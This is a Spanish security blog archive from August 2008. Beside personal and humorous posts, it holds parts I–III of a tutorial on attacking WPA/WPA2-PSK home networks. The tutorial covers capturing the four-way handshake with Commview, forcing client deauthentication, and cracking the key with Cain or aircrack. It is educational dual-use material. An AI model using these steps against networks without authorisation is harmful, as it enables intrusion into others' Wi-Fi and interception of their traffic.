- Webcast Seguridad en Redes Wireless
- Securing Wireless Lans with PEAP and Passwords
- Securing Wireless Lans with Certification Services

***************************************************************************************
Atacar WPA/WPA2 PSK (parte I de IV)
Atacar WPA/WPA2 PSK (parte II de IV)
Atacar WPA/WPA2 PSK (parte III de IV)
Atacar WPA/WPA2 PSK (parte IV de IV)
***************************************************************************************

miércoles, agosto 06, 2008

Road To Las Vegas

Hola a tod@s,

este es el último post que pongo antes de volar a Las Vegas para participar en la charla de la Defcon16. No he tenido mucho tiempo estos días para polemizar en el blog, ya que entre el kickoff de la empresa y la preparación de la charla el tiempo ha volado.

Ahora, en la tranquilidad de la noche, cuando el sueño se apodera un poco de mi me da pereza pensar en el largo vuelo que me hará dejar otra vez Madrid lejos, a la espalda. Me gusta viajar y lo he hecho por medio mundo, pero no hay nada como volver a este Madrid. No pensé que lo iba a echar tanto de menos cuando me fui a Londres a pasar un tiempo para poder dar la charla en la Blackhat y ahora ésta en la Defcon, pero lo llegué a añorar. No, que nadie se equivoque, me gusta viajar, y sé que soy afortunado por ello, pero no me puedo imaginar viviendo fuera de este Madrid.

Cuando llegue a Las Vegas seguro que me lo paso fetén. Voy ver a gente que hace mucho tiempo que no veo, gente que me apetece ver y conocer y, por supusto, vivir cosas que me apetece vivir. Cosas nuevas, cosas chulas. Seguro que la adrenalina se apoderará de mí y no podré parar de hacer actividades. Ya he estado allí y sé que es un parque de atracciones para adultos...con TODAS las atracciones que desees. Tal vez no duerma alguna noche, tal vez me pase con el alcohol alguna otra y tal vez me gaste más pasta de la que debo, pero...la vida pasa por delante de mi puerta y a mi me gusta vivir con ella.

Allí en Las Vegas veré a David Barroso, a Luciano, a los Pandas with Gambas, y a algún que otro golfo que ha dado la vuelta al mundo para pasar unos días "putamadre" y que nadie espere que el abuelo y yo estemos tranquilos y apocapados... Esta vez, aprendida la experiencia de Blackhat pedí a la organización hablar de los primeros... ¿sabéis por qué? Sí, para eso, para quitarme todo el estrés el primer día y estar liberado todo el finde, podiendo hacer LO QUE QUIERA.... ¡y nos pusieron el Viernes! Nikita... ¡aylofiu!

Después, a la vuelta, vendré pensando en mis compañe...digo... esclavos, muchos estarán de vacaciones, algunos currando.... Juanfran, Alex, Juanito el trianero, Pedrito, Rodol, Manu, Jerito, Rubén, Carlos 3pezones, nuestro Hamilton particular, Almita, Franky, Robertito, Tony Manero, el pequeño Matias, Antonio el melenas, Nogal, Sus, Roxy Toxic, Joshuita, Julianín, Juanlugi y los pobres que no pudieron venirse a los Karts [Fernando y José Carlos, os debo un regalo especial]. ¡Tened buenas vacaciones, queridos esclavos!

Me acordaré de todos los que trabajan conmigo en remoto, Antonio Guzmán, Enrique Rando, Alex [quiero mis pimientos!], Txipi, Hector-bando, Mikel o Cervigón, de mis profesores de seguridad informática particulares: RoMaNSoFt [eres muy grande!], Mandingo, Bernardo "el flamante Spectra MVP de Seguridad" Quintero, mi pajarraco de Los Santos [que nos está preparando una sorpesa a todos por los 10 años de Hispasec y como no llegue a tiempo le van a caer collejas de mi parte...], mi Palakito, o la gente de elhacker.net, el Gran Germi con su corazón de oro, las jovenes [y no tan jovenes] promesas [y ya consagradas] chavales de los clubs, Sirw2p, mis cañeros ubunteros, mis "editores" Comino, Mercedes, Aurora y Carles, los compañeros MVPs, con Miguel H., Ivanin, Unai, Paniagua o el gran Rodrigo entre otros, de los que hacen cosas que merecen la pena, como Elenita "la presi", Iñaki y su juego ese de los coches, el gran "little Budda" y su Criptored, Alexa y su wikipedia y de tantos y tantos personajes de buena y mala ralea que pueblan mi vida. Muchos no estáis en Madrid, pero los filamentos que os unen a mí salen todos desde esta tierra dónde se cruzan los caminos.

Sí, estoy camino a Las Vegas... pero ya regreso.

Saludos Malignos!

PD: De tí, también me acuerdo y sé que lo sabes ;)

martes, agosto 05, 2008

Atacar WPA/WPA2 PSK (parte III de IV)

Imagen 8: Hanshake WPA2 capturado
Una vez que se tiene capturado el intercambio se envía a craquear, es posible utilizar un ataque por fuerza bruta o basarse en un diccionario para tratar de agilizar el proceso.

Imagen 9: Ataque sobre el hash de autenticación
El éxito del ataque ahora radica única y exclusivamente en la fortaleza de las password que haya utilizado el administrador de la red. Si ha colocado una clave de red que aparezca en un diccionario o la clave es suficientemente pequeña e insegura será factible romperla. Para tratar de romperla por fuerza bruta es necesario elegir el alfabeto a utilizar, las longitudes mínimas y máximas y empezar a probar.

Imagen 10: Ataque por fuerza bruta sobre el hash de autenticación
Para el ataque basado en diccionario, es necesario contar con un buen diccionario, e indicar las posibles pruebas a realizar con cada una de las palabras disponibles en el diccionario.

Imagen 11: Ataque por diccionario sobre el hash de autenticación
En cualquiera de los dos casos si consigue dar con la clave nos lo mostrará en la parte inferior con un mensaje como el siguiente:

Imagen 12: Resultado exitoso en el ataque sobre el hash de autenticación
La última versión de Cain tiene como limitación que no es capaz de trabajar con ciertos caracteres, con lo cual no sería posible crackear algunos hash de autenticación. Como alternativa a Cain se puede utilizar la suite aircrack, disponible tanto en Linux como en Windows, que permite trabajar con todo el abanico posible de caracteres.

Imagen 13: Éxito en el ataque sobre el hash de autenticación con aircrak
[Continuará]

***************************************************************************************
Atacar WPA/WPA2 PSK (parte I de IV)
Atacar WPA/WPA2 PSK (parte II de IV)
Atacar WPA/WPA2 PSK (parte III de IV)
Atacar WPA/WPA2 PSK (parte IV de IV)
***************************************************************************************

lunes, agosto 04, 2008

Pretty Penguin

Es normal que acabara pasando esto. Con la subida de los tipos de interés, el credicimiento del euribor, una inflacción prevista para más del 5% y una tasa de paro esperada para el 12% y, teniendo en cuenta que en su trabajo principal trabaja como voluntario apoyando el mal llamado "Software Libre" sin cobrar un puñetero €uro... era normal que acabara pluriempleado.

Tux en el Supermercado
En este caso ha acabado haciendo un digno trabajo de vendedor de jamones, de aceite, de Coca-Cola, etc... pero podría haber sido peor...

¿Os imaginais que hubiera terminado ¿cómo pingüino de compañía de alto stánding? Sí, acompañando a directores de multinacionales sólo por dinero para poder comer y que estos directivos de multinacionales sólo le quisieran para que los demás les vieran. Sí, al estilo "Pretty Woman", sólo para lucir ese cuerpo fibroso y bien fomado del pobre TUX. Esas aletas esculturales llevando ropa interior sexi con logos de multinacionales que no están nada interesadas en su amor, que nada más que le quieren por puro vicio, por sexo, por depravación, para hacerle cosas que no le harían a sus amad@s....

"Pretty penguin walkin down the street
Pretty penguin, the kind I like to meet
Pretty penguin, I dont believe you
Youre not the truth
No one could look as good as you
Mercy

Pretty penguin, wont you pardon me
Pretty penguin, I couldnt help but see
Pretty penguin, and you look lovely as can be
Are you lonely just like me"
En fin, que hay que animar a TUX en su andadura profesional o felicitar al diseñador de la publicidad que se lo ha montado de puta madre.

Saludos Malignos!

domingo, agosto 03, 2008

Atacar WPA/WPA2 PSK (parte II de IV)

Imagen 2: Driver de commview instalado
Una vez instalado correctamente el driver, en la barra de herramientas principal de Commview se debe activar la captura de tráfico con el botón de Play. Con la captura de tráfico activada se podrá comenzar la exploración de los canales WI-FI accesibles, como se muestra en la Imagen 3.

Imagen 3: Exploración de puntos de acceso
Commview mostrará todas las redes disponibles en todos los canales ofreciendo una visión global del espacio WI-FI del área. Una vez seleccionada la red objetivo, basta con activar la captura de paquetes de esa red con el botón de capturar que se encuentra en el panel de opciones de la derecha.

Commview muestra, en la pestaña Nodos, los puntos de acceso y clientes asociados que usan el canal en un determinado instante.

Imagen 4: Nodos usando el canal
En la imagen 4 se puede ver un punto de acceso usando WPA2-PSK con cifrado CCMP y dos clientes que se encuentran asociados a la red. En estos momentos Commview se encuentra capturando todos los paquetes que circulan por el canal. Para no saturar el equipo, dado que el objetivo en un primer momento, es capturar el intercambio de los números aleatorios en el proceso de autenticación WPA/WPA2, es suficiente con capturar únicamente los paquetes de datos. Para realizar esta selección de paquetes es posible añadir filtros en la captura, por ejemplo por direcciones MAC de los equipos.

Imagen 5: Configuración de las reglas de captura
El ataque 0

Para obtener el intercambio de números aleatorios entre un equipo y el punto de acceso de forma rápida, es decir, sin esperar a que un nuevo equipo se conecte a la red, se lanza un ataque de desasociación de modo que se desconecte el equipo obligándolo a conectar de nuevo. Este proceso es automático en sistemas operaitos Windows XP pero se requiere de la intervención del usuario en Windows Vista. Para hacer esto desde Commview basta con acudir al menú herramientas y pulsar sobre Reasociación de Nodos.

Imagen 6: Ataque para obligar a un nodo a reasociarse
Para tener acceso a estas opciones es necesario que la tarjeta wireless permita la inyección de paquetes. En caso de estar usando el chipset de Intel 2200BG, no será posible realizar la inyección, con lo que la única solución es esperar a que algún cliente se autentifique con el punto de acceso.

En este cuadro de diálogo se selecciona el punto de acceso que va a ser spoofeado, es decir, la dirección que va ser simulada como origen de envío de la trama de desasociación, y el cliente que se quiere desasociar. Además, se debe indicar el número de paquetes a enviar.

Una vez lanzado el ataque, y dado que Commview ha estado capturando todos los paquetes, bastaría con almacenar los mismos en formato .cap, de modo que se tendrían todos los paquetes, incluidos aquellos donde se realiza el intercambio de números aleatorios listos para craquear la PSK que está siendo utilizada en esa red.

Imagen 7: Guardar los paquetes capturados
[Continuará]

***************************************************************************************
Atacar WPA/WPA2 PSK (parte I de IV)
Atacar WPA/WPA2 PSK (parte II de IV)
Atacar WPA/WPA2 PSK (parte III de IV)
Atacar WPA/WPA2 PSK (parte IV de IV)
***************************************************************************************

sábado, agosto 02, 2008

Se busca abogado defensor

Dicen que todo el mundo tiene derecho a ser defendido en un juicio, así que no debería darse ningún juicio sin que alguno de los acusados no tenga alguien que le defienda (aunque sea el mismo el que tome esa responsabilidad).

Todos los veranos, con la llegada del calor, el número de ciberparties se multiplica por el territorio nacional. En ellas, los organizadores, acaban buscando colaboradores que ayuden en la creación de una oferta más completa para la quedada.

Los habituales “pedazo de tubo” para descargar cosas a saco y "manteca de la buena", concursos de los últimos games y “enseña tu PC” se acompañan de talleres de Mooding, concursos trivia, competición de reto hacker o conferencias.

En ese último apartado es dónde nos solemos apuntar en las parties y normalmente hablando de seguridad informática o técnicas hacker o algo así. Yo he tenido el gusto de participar en la Campus Party del 2004, en Euskal Encounter del 2005, la Party Quijote del 2006, la Alcolea del 2007, la Navarparty del 2007 [no os perdáis la charla grabada de Iñaki Ayucar], y si todo va bien, acabaré estando este año 2008 en la Navarparty otra vez.

Pero no sólo yo me animo a ir a dar este tipo de charlas/Talleres a las parties, también algunos compañeros. Este verano nos han pedido que participáramos en la Priego CyberPary del 2008 y en Lancelona 2008. La party de Priego nos pillaba horriblemente mal las fechas y sólo hemos podido colaborar con un envío de libros para premios pero en Lancelona sí que estaremos para participar allí.

En Lancelona 2008 mi compañero Pedro Laguna o yo (aun está por ver cómo nos cuadra el trabajo) daremos una charla/taller sobre técnicas hacking y, nos han solicitado un ponente para DEFENDER A WINDOWS en un debate de sistemas operativos. Según me comentan han intentado encontrar alguien para defenderlo por varios sitios y no han encontrado a nadie.

Yo, con el “afán de ayudarles” a encontrar a ese abogado, les he dicho que intentaría darles una solución esta semana, así que me gustaría encontrar un abogado. ¿Alguno de vosotros se anima a participar en ese debate como Abogado de Windows? Sí, sabemos que es CULPABLE, pero todo el mundo tiene derecho a ser defendo.

Saludos Malignos!

No Lusers 50: Ciberparties

viernes, agosto 01, 2008

Atacar WPA/WPA2 PSK (parte I de IV)

***************************************************************************************
Atacar WPA/WPA2 PSK (parte I de IV)
Atacar WPA/WPA2 PSK (parte II de IV)
Atacar WPA/WPA2 PSK (parte III de IV)
Atacar WPA/WPA2 PSK (parte IV de IV)
***************************************************************************************
[Este artículo ha sido escrito por Alejandro Martín y Chema Alonso]
Hablar de seguridad Wireless en el ámbito domestico es hablar, irremediablemente, de WPA/WPA2 PSK, dejando a un lado el viejo y vulnerado cifrado WEP. Sí, existen puntos de Acceso WiFi con servidor RADIUS incorporados, pero no es lo más común que se encuentra en el router que utiliza una familia para conectarse a Internet en su casa.

En el presente artículo vamos a ver de forma práctica cómo funcionan las amenazas en WPA/WPA-2 PSK en el ámbito domestico. Para ello se verá como se puede atacar una infraestructura de estas características y cuáles son las recomendaciones de seguridad.

WPA/WPA2

WPA [Wifi Protected Access] surge como una solución temporal de la Wi-Fi Alliance mientras que en IEEE se trabajaba sobre el estándar IEEE 802.11i para securizar las redes Wireless una vez que quedó de manifiesto la debilidad de WEP [Wired Equivalent Privacy]. Cuando IEEE sacó a la luz 802.11i, la Wi-Fi Alliance proporcionó la certificación WPA2 a todos aquellos dispositivos que cumplían con las especificaciones marcadas por el nuevo estándar. Ambas soluciones, WPA y WPA2, soportan el protocolo 802.1x para la autenticación en ámbitos empresariales y la autenticación mediante clave compartida (PSK) [Pre-Shared Key] para los entornos SOHO [Small Office and Home Office] y ámbitos domésticos.

WPA y WPA2 se diferencian poco conceptualmente y difieren principalmente en el algoritmo de cifrado que emplean. Mientras WPA basa el cifrado de las comunicaciones en el uso del algoritmo TKIP [Temporary Key Integrity Protocol], que está basado en RC4 al igual que WEP, WPA2 utiliza CCMP [Counter-mode/CBC-MAC Protocol] basado en AES [Advanced Encrytion System]. La segunda diferencia notable se encuentra en el algoritmo utilizado para controlar la integridad del mensaje. Mientras WPA usa una versión menos elaborada para la generación del código MIC [Message Integrity Code], o código “Michael”, WPA2 implementa una versión mejorada de MIC.

Lógicamente, a la hora de elegir cómo securizar la red domestica, mejor decantarse por WPA2-PSK debido a que la fortaleza de cifrado de AES es netamente superior a la de TKIP. Sin embargo, si no se cuenta con el hardware que soporte esta tecnología es perfectamente válido el uso de WPA-PSK pues la principal vulnerabilidad de WPA-PSK y WPA2-PSK no se encuentra en el algoritmo de cifrado sino en la fortaleza de la clave utilizada.

Arquitectura WPA/WPA2 PSK

Tanto WPA-PSK como WPA2-PSK adolecen de vulnerabilidad y es posible atacar estas tecnologías con el objetivo de poder hacer uso de la red e incluso escuchar y analizar el tráfico que por ella se propaga. En este articulo se pretenden reflejar por qué y dónde es vulnerable WPA-PSK y WPA2-PSK, cómo explotar esta vulnerabilidad y cómo proteger adecuadamente la red.

Para entender las vulnerabilidades hemos primero de analizar el proceso de asociación de un cliente a la red wireless. Independientemente del sistema de seguridad que se elija para la red (WEP, WPA-PSK o WPA2-PSK), el proceso de asociación es siempre el mismo. Este proceso va a depender de si el punto de acceso está emitiendo tramas “Beacon Frame” para el anuncio de la red mediante la publicación de su ESSID [Extended Service Set Indentifier] o no.

Si el punto de acceso está emitiendo tramas “Beacon frame” el cliente se conecta a la red en dos fases, una primera Fase de Autenticación, que podrá ser abierta o con clave compartida, y una segunda Fase de Asociación.

En el supuesto caso de que el punto de acceso no esté emitiendo “Beacon frames” existe una Fase de Prueba inicial dónde el cliente envía el ESSID de la red wireless a la que quiere conectarse esperando que el punto de acceso responda y así iniciar las fases de Autenticación y Asociación. Todo este proceso, para una conexión WPA2-PSK puede verse en la imagen siguiente. En ella se pueden ver las tres fases descritas.

Imagen 1: Negociación WPA2-PSK en una red sin publicación de ESSID
La única diferencia con una red Abierta o WEP, es que punto de acceso y cliente acuerdan la política de seguridad a seguir, siendo ésta la primera fase del proceso de autenticación de una red WPA/WPA2.

Esta forma de funcionar es importante conocerla, pues como puede verse en al imagen, el cliente se conecta inicialmente a la red sin que haya comenzado el proceso de autenticación WPA/WPA2, tanto si es por medio de PSK como si no, por lo que el tráfico enviado todavía no está siendo cifrado. Debido a esta situación un atacante podría mandar una trama de des-asociación a un cliente de la red provocando que éste se desasocie e inicie un proceso de asociación nuevamente y un nuevo proceso de autenticación WPA/WPA2. A esto se le conoce como el ataque 0 o de des-asociación.

Este proceso de re-autenticación se realizaría únicamente si la conexión se tratase de WPA/WPA2 empresarial, es decir, la conexión está configurada utilizando 802.1x para la autenticación del puerto y EAP [Extended Authetication Protocol] contra un servidor RADIUS [Remote Authentication Dial-In Service] para autenticar la conexión. En el caso de WPA/WPA2 con PSK se pasa directamente a la fase de intercambio de claves.

En la fase de Intercambio de claves el cliente y el AP utilizan la PSK para generar un clave llamada PMK [Pairwise Master Key]. Esta PMK es una derivada cuando el sistema es WPA/WPA2 empresarial pero es la misma PSK en los entornos WPA/WPA2 PSK.

Con la PMK se genera una clave de cifrado para cada proceso de autenticación de un cliente llamada PTK que básicamente se genera a partir de dos números aleatorios, uno de ellos generado por el cliente y el otro por el punto de acceso que intercambian para obtener ambos la misma clave PTK. Este proceso se llama 4-way-Handshake.

Una vez que el cliente está autenticado, el protocolo TKIP utiliza 6 claves de cifrado por cada sesión, 4 de ellas son utilizadas para comunicaciones unicast y 2 para comunicaciones broadcast. Estas claves son únicas por cliente y sesión y se cambian periódicamente. Estas claves se generan a partir de derivadas de las direcciones MAC, ESSID y la PTK.

¿Cómo puede ser vulnerada la red WPA/WPA2 PSK?

Un atacante que quiera vulnerar una red WPA-PSK va a tratar de capturar ese intercambio de números aleatorios, para una vez conocidos estos, junto con el SSID y las direcciones MAC del cliente y el punto de acceso de la red obtener la frase o secreto compartido que se utilizó. Una vez que el atacante tenga la clave compartida se podrá conectar a la red.

¿Podrá el atacante acceder al tráfico generado por otro usuario?

En teoría no debería poder, pues las claves TKIP que se generan son únicas y por sesión pero sí el atacante está conectado a la red y captura todo el proceso de autenticación de otro usuario podría acceder a los números aleatorios intercambiados y al poder conocer el ESSID, la PSK y la MAC del cliente y el punto de acceso, podría generar la PTK. Con la PTK podría descubrir cuáles son las claves TKIP que se intercambian cifradas. Una vez que el atacante tiene las claves TKIP tiene acceso a todo el tráfico y por tanto SÍ puede acceder a los datos transmitidos. El proceso con WPA2-PSK es similar y el atacante buscará las claves que se intercambian en AES-CCMP.

¿Se podrá modificar la información en tránsito?

WPA y WPA2 implementan de forma distinta el MIC [Message Integrity Code] y, aunque en teoría el MIC de WPA podría ser engañado, las condiciones para poder realizar dicho cambio no se dan en la implementación práctica que se hace. Está bien explicado este aspecto y puedes leer más sobre él en el trabajo “Observations on the Message Integrity Code in IEEE802.11Wireless LANs” de Jianyong Huang, Willy Susilo y Jennifer Seberry de la School of Information Technology and Computer Science de la University of Wollongong en Australia.

No obstante, si deseas conocer a fondo la teoría de los ataques a los protocolos Wireless, el artículo de Guillaume Lehembre, publicado en la revista Hackin9 es de lo mejor que existe. Y además, está traducido al castellano: Seguridad WiFi – WEP, WPA y WPA2

[Continuará]

***************************************************************************************
Atacar WPA/WPA2 PSK (parte I de IV)
Atacar WPA/WPA2 PSK (parte II de IV)
Atacar WPA/WPA2 PSK (parte III de IV)
Atacar WPA/WPA2 PSK (parte IV de IV)
***************************************************************************************

Hands On Lab

AZLAN D-LINK Academy

Windows Técnico

Archivo del blog

Blogs y Links